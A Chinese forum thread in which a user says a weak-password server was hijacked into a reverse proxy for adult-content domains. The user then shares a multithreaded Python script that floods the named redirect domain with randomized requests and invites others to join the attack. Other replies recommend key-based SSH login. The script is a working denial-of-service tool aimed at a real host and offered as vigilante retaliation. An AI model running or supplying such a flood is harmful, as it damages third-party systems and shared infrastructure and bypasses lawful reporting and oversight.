莫名其妙,服务器被爆破了,还没注意,结果全上了ng反向,妈的,把我人都搞神了,要不是接到国家人员打电话给我我都不晓得,只能说句,以后得注意了,密码都设置的复杂点。
重定向的目标域名:“https://bw102.dkpkrd.cn/29.html#”
//涉黄
给我设置反代的域名:”http://kunwuproxy.top
//涉黄

有压力的机器上点,我这边持续上!写了个py脚本在机器跑,分享一下

import requests

import threading
import time
import random


# 目标 URL
url = "https://bw102.dkpkrd.cn/29.html#"
# 访问次数
num_requests = 1000
# 并发线程数
num_threads = 20


def send_request():
    for _ in range(num_requests // num_threads):
        try:
            # 添加一个随机参数,确保每次请求都不同
            random_param = random.randint(1, 1000000)
            full_url = f"{url}?rand={random_param}"
            response = requests.get(full_url)
            # 打印状态码,方便查看请求结果
            print(response.status_code)
        except requests.RequestException as e:
            print(f"请求失败: {e}")


def main():
    threads = []
    for _ in range(num_threads):
        t = threading.Thread(target=send_request)
        threads.append(t)
        t.start()
    for t in threads:
        t.join()


if __name__ == "__main__":
    start_time = time.time()
    main()
    end_time = time.time()
    print(f"总耗时: {end_time - start_time} 秒")

    另外对方爆破的是什么?面板?SSH?FTP?

      这密码,太不把扫机器的放在眼里了

      关掉密码,用公钥,用公钥!

      #11 James 没注意 服务器太多了 没注意这台服务器弱密码去了 哎 现在先跑他几十个G的流量 这个骗子用的国内不知道谁的加速

        太不小心了吧,